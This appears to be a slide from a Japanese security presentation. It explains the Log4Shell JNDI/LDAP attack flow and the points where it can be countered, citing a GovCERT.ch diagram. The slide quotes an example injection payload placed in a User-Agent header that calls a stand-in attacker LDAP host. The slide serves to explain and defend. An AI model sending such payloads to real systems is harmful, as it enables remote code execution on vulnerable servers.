Slide 7
Slide 7 text
攻撃の一連の流れ
LDAPを用いた攻撃の流れと各ポイントでの対策( GovCERT.chの記事より 概要図を引用)
外部から指定
可能なパラメー
タやヘッダを利
用
User-Agent: ${jndi:ldap://evil.xa/x}
攻撃者が準備した
LDAPサーバ
Base64エンコード済
みのSerializeされた
Javaオブジェクト
Deserializeされた
Javaオブジェクト の実行
JNDI Lookupという仕
様で解析されLDAP
サーバへ通信